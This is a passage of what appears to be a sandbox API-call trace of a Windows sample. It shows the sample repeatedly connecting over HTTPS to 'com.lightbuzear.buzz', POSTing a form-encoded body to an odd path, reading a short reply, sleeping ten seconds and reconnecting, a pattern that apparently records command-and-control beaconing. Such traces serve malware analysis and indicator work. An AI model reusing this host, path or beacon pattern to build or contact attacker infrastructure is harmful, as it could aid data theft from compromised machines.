0x480f1a0 [0284.102] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0284.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f0e0 [0284.102] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1a0 | out: hHeap=0x4780000) returned 1 [0284.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0284.102] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0e0 | out: hHeap=0x4780000) returned 1 [0284.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf068 [0284.102] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0284.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0284.102] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf068 | out: hHeap=0x4780000) returned 1 [0284.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47befa0 [0284.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0284.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf018 [0284.103] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0284.103] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0284.104] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0284.104] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0284.114] FreeLibrary (hLibModule=0x71780000) returned 1 [0284.115] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf018 | out: hHeap=0x4780000) returned 1 [0284.115] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0284.115] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf0e0 [0284.115] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0284.116] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6f0 [0284.116] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0284.116] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0284.116] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0284.116] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0284.116] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0284.116] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0284.116] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0284.116] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0284.116] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f0c8 [0284.116] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0284.116] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f1b8 [0284.116] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0c8 | out: hHeap=0x4780000) returned 1 [0284.116] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0284.116] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1b8 | out: hHeap=0x4780000) returned 1 [0284.116] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f1a0 [0284.116] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bef28 [0284.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef28 | out: hHeap=0x4780000) returned 1 [0284.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0284.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bef00 [0284.117] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0284.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf108 [0284.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0284.118] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0284.118] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0284.118] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0284.118] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0284.118] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0284.118] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0284.118] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0284.118] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0284.118] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f1b8 [0284.118] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0284.118] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f0c8 [0284.118] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1b8 | out: hHeap=0x4780000) returned 1 [0284.118] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0284.118] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0c8 | out: hHeap=0x4780000) returned 1 [0284.118] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f1b8 [0284.118] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bee38 [0284.119] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bee38 | out: hHeap=0x4780000) returned 1 [0284.119] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0284.119] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0284.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0284.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0284.119] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0284.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0284.119] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0284.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0284.119] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0284.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0284.129] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0284.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed08 [0284.129] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0284.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eb10 [0284.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed08 | out: hHeap=0x4780000) returned 1 [0284.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0284.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb10 | out: hHeap=0x4780000) returned 1 [0284.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf018 [0284.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0284.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0284.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf018 | out: hHeap=0x4780000) returned 1 [0284.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bef28 [0284.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0284.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed48 [0284.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0284.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0284.131] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0284.131] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0284.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0284.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0284.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0284.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0284.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0284.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0284.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0284.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0284.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0284.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0284.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ea98 [0284.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0284.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ecd8 [0284.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ea98 | out: hHeap=0x4780000) returned 1 [0284.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0284.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ecd8 | out: hHeap=0x4780000) returned 1 [0284.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf158 [0284.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0284.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0284.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf158 | out: hHeap=0x4780000) returned 1 [0284.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf018 [0284.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0284.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed48 [0284.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0284.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0284.133] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0284.134] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0285.190] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0285.190] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0285.190] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0285.191] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0285.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0285.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0285.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0285.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0285.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0285.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0285.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0285.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0285.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0285.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eae0 [0285.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0285.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eb10 [0285.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eae0 | out: hHeap=0x4780000) returned 1 [0285.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0285.192] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb10 | out: hHeap=0x4780000) returned 1 [0285.192] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bef50 [0285.192] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0285.192] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0285.192] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef50 | out: hHeap=0x4780000) returned 1 [0285.192] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bef50 [0285.192] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb978 [0285.192] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bee38 [0285.192] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0285.193] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0285.193] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0285.193] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0285.193] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bee38 | out: hHeap=0x4780000) returned 1 [0285.194] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0285.194] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0285.194] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0285.194] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0285.194] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0285.194] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0285.194] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0285.194] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0285.194] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0285.194] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0285.194] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eae0 [0285.194] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0285.194] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eab0 [0285.194] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eae0 | out: hHeap=0x4780000) returned 1 [0285.195] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0285.195] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eab0 | out: hHeap=0x4780000) returned 1 [0285.195] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf040 [0285.195] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0285.195] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb978 [0285.195] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf040 | out: hHeap=0x4780000) returned 1 [0285.195] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf158 [0285.195] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0285.195] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf180 [0285.195] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0285.196] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0285.196] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0285.196] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0285.196] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf180 | out: hHeap=0x4780000) returned 1 [0285.196] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0285.196] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0285.196] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0285.197] FreeLibrary (hLibModule=0x71570000) returned 1 [0285.197] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0285.197] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0285.197] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf108 | out: hHeap=0x4780000) returned 1 [0285.197] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef00 | out: hHeap=0x4780000) returned 1 [0285.197] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf0e0 | out: hHeap=0x4780000) returned 1 [0285.198] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0285.203] Sleep (dwMilliseconds=0x2710) [0285.231] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0285.231] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0285.231] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0285.231] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0285.231] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0285.231] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0285.231] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0285.232] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0285.232] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0285.232] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f0c8 [0285.232] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0285.232] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f200 [0285.232] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0c8 | out: hHeap=0x4780000) returned 1 [0285.232] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0285.232] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f200 | out: hHeap=0x4780000) returned 1 [0285.232] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f0c8 [0285.232] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0285.233] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0285.233] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0285.233] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0285.233] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0285.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0285.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0285.234] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0285.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0285.234] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0285.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0285.234] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0285.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0285.234] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0285.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f200 [0285.235] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0285.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f0e0 [0285.235] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f200 | out: hHeap=0x4780000) returned 1 [0285.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0285.235] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0e0 | out: hHeap=0x4780000) returned 1 [0285.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bee38 [0285.235] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0285.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd68 [0285.235] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bee38 | out: hHeap=0x4780000) returned 1 [0285.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf0e0 [0285.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0285.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed48 [0285.236] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0285.236] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0285.237] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0285.237] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0285.237] FreeLibrary (hLibModule=0x71780000) returned 1 [0285.237] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0285.237] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0285.237] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bee38 [0285.237] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 